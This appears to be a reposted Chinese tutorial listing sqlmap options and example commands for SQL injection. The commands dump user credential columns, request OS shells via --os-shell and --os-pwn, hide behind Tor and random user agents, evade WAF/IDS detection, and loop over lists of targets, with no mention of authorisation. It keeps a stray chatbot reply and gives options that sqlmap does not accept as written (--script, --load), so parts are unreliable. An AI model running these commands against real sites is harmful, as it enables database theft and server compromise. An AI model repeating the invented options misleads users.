2024最新的最全面基本sqlmap使用命令

本文主要是介绍2024最新的最全面基本sqlmap使用命令，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

sqlmap 是一个广泛使用的开源渗透测试工具，专门用于自动化检测和利用 SQL 注入漏洞。以下是对您列出的每个字段的详细举例说明：

基础帮助和版本

• -h, --help：显示基本的帮助信息并退出。这对于快速查看最常用的选项非常有用。
• -hh：显示高级帮助信息并退出。这包括更详细的选项描述和示例。
• --version：显示程序的版本号并退出。这有助于确认您正在使用的 sqlmap 版本。

目标（Target）

• -u URL, --url=URL：指定目标 URL。例如，"http://www.site.com/vuln.php?id=1"，这通常是一个包含潜在 SQL 注入点的 URL。
• -g GOOGLEDORK：处理 Google Dork 结果作为目标 URL。Google Dork 是一种搜索查询，用于在 Google 上查找可能包含漏洞的网站。

请求（Request）

• --data=DATA：通过 POST 请求发送的数据字符串。例如，"id=1"，这在测试需要 POST 请求的表单时非常有用。
• --cookie=COOKIE：HTTP Cookie 头的值。例如，"PHPSESSID=a8d127e.."，这对于需要会话认证的网站是必要的。
• --random-agent：使用随机选择的 HTTP User-Agent 头值，以避免被网站通过 User-Agent 识别为自动化工具。
• --proxy=PROXY：使用代理连接到目标 URL。这有助于绕过 IP 地址封锁或进行匿名测试。
• --tor：使用 Tor 匿名网络。这有助于保持匿名性。
• --check-tor：检查是否正确使用了 Tor。

注入（Injection）

• -p TESTPARAMETER：指定要测试的参数。如果 URL 中有多个参数，您可以选择测试其中的特定一个或多个。
• --dbms=DBMS：强制后端数据库管理系统（DBMS）为指定值。这有助于 sqlmap 更准确地识别目标 DBMS。

检测（Detection）

• --level=LEVEL：设置执行的测试级别（1-5，默认为 1）。级别越高，执行的测试越彻底，但可能需要更长时间。
• --risk=RISK：设置执行测试的风险级别（1-3，默认为 1）。风险级别越高，执行的测试可能越危险，如尝试修改数据库结构或数据。

技术（Techniques）

• --technique=TECH..：指定要使用的 SQL 注入技术（默认为 "BEUSTQ"）。这允许您根据目标的防御机制选择最合适的技术。

枚举（Enumeration）

• -a, --all：检索所有可能的信息，包括数据库、表、列和数据。
• -b, --banner：检索 DBMS 的 banner 信息。
• --current-user：检索 DBMS 的当前用户。
• --current-db：检索 DBMS 的当前数据库。
• --passwords：枚举 DBMS 用户的密码哈希。
• --dbs：枚举 DBMS 中的数据库。
• --tables：枚举数据库中的表。
• --columns：枚举表中的列。
• --schema：枚举 DBMS 的架构。
• --dump：转储指定数据库表的条目。
• --dump-all：转储所有数据库表的条目。
• -D DB：指定要枚举的 DBMS 数据库。
• -T TBL：指定要枚举的 DBMS 数据库表。
• -C COL：指定要枚举的 DBMS 数据库表列。

操作系统访问

• --os-shell：请求一个交互式操作系统 shell。
• --os-pwn：请求一个 out-of-band shell、Meterpreter 或 VNC，以便在底层操作系统上执行更高级的命令。

一般（General）

• --batch：从不请求用户输入，使用默认行为。这对于自动化脚本非常有用。
• --flush-session：为当前目标刷新会话文件。这有助于清理旧的测试数据。

其他（Miscellaneous）

• --wizard：为初学者用户提供简单的向导界面。这有助于新用户更容易地开始使用 sqlmap。

使用示例

要查看完整的选项列表，可以运行 sqlmap.py -hh。例如，要测试 URL http://www.site.com/vuln.php?id=1 的 id 参数是否存在 SQL 注入漏洞，可以使用以下命令：

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -p id

混合使用

当然，我可以为你生成一些详细组合使用的sqlmap命令示例，涵盖不同的使用场景。请注意，由于sqlmap的选项非常丰富，我将选取几个典型的用例来展示。

1. 基本扫描

扫描单个URL

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --level=3 --risk=2

这个命令将扫描指定的URL，使用中等测试级别（3）和中等风险级别（2）来寻找SQL注入漏洞。

2. 使用POST数据

发送POST请求

bash复制代码

sqlmap.py -u "http://www.site.com/login.php" --data="username=admin&password=123456" --level=3 --risk=3

这个命令通过POST方法发送用户名和密码，并使用高级别（3）和高风险（3）进行扫描。

3. 枚举数据库信息

枚举所有数据库

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --dbs --batch

使用--dbs选项枚举后端数据库的所有数据库名，并启用--batch选项以避免任何交互式提示。

枚举特定数据库中的表

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -D usersdb --tables --batch

指定数据库usersdb并枚举其所有表。

导出特定表的数据

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" -D usersdb -T users --dump --batch

导出usersdb数据库中users表的所有数据。

4. 使用代理和Tor

通过Tor进行扫描

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --tor --check-tor --level=5

使用Tor匿名网络进行扫描，并检查Tor是否正确配置。

使用自定义代理

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080" --level=4

通过本地代理（例如Burp Suite）进行扫描。

5. 自定义请求头

自定义User-Agent

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --level=3

每次请求使用随机的User-Agent头进行扫描。

添加Cookie

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --cookie="PHPSESSID=a8d127e.." --level=2

添加自定义的Cookie头进行扫描。

6. 自定义注入测试

指定测试参数

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1&user=admin" -p "id,user" --level=5

指定id和user两个参数进行测试。

强制DBMS

bash复制代码

sqlmap.py -u "http://www.site.com/vuln.php?id=1" --dbms=MySQL --level=4

强制后端数据库为MySQL并进行扫描。

这些示例应该能够涵盖sqlmap的一些常用和高级用法。请根据你的具体需求进行调整。
 

通过代理进行注入测试

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080"

绕过WAF/IDS的检测

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --tamper="space2comment"

批量处理多个URL

bash复制代码

sqlmap -m targets.txt

其中targets.txt包含多个目标URL，每行一个。

7.自动化与脚本化

使用自定义脚本

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --script=my_custom_script.py

批量自动化测试

结合shell脚本或Python脚本，批量调用sqlmap命令，处理大量目标。

8.高级特性与技巧

获取操作系统访问权限

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --os-shell

或

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --os-pwn

调试模式

bash复制代码

sqlmap -u "http://example.com/vuln.php?id=1" --debug

保存和恢复会话

bash复制代码

	sqlmap -u "http://example.com/vuln.php?id=1" --save=session.sqlmap
	sqlmap --load=session.sqlmap

9.实战案例

实战案例1：检测并枚举目标

bash复制代码

	# 第一步：检测SQL注入
	sqlmap -u "http://example.com/vuln.php?id=1"
	# 第二步：枚举所有数据库
	sqlmap -u "http://example.com/vuln.php?id=1" --dbs
	# 第三步：枚举特定数据库的所有表
	sqlmap -u "http://example.com/vuln.php?id=1" -D interesting_db --tables
	# 第四步：导出特定表的数据
	sqlmap -u "http://example.com/vuln.php?id=1" -D interesting_db -T users -C "username,password" --dump

实战案例2：自动化测试多个目标

bash复制代码

	# 编写shell脚本，遍历targets.txt中的每个URL，使用sqlmap进行测试
	#!/bin/bash
	while read url; do
	sqlmap -u "$url" --dbs
	done < targets.txt

这篇关于2024最新的最全面基本sqlmap使用命令的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---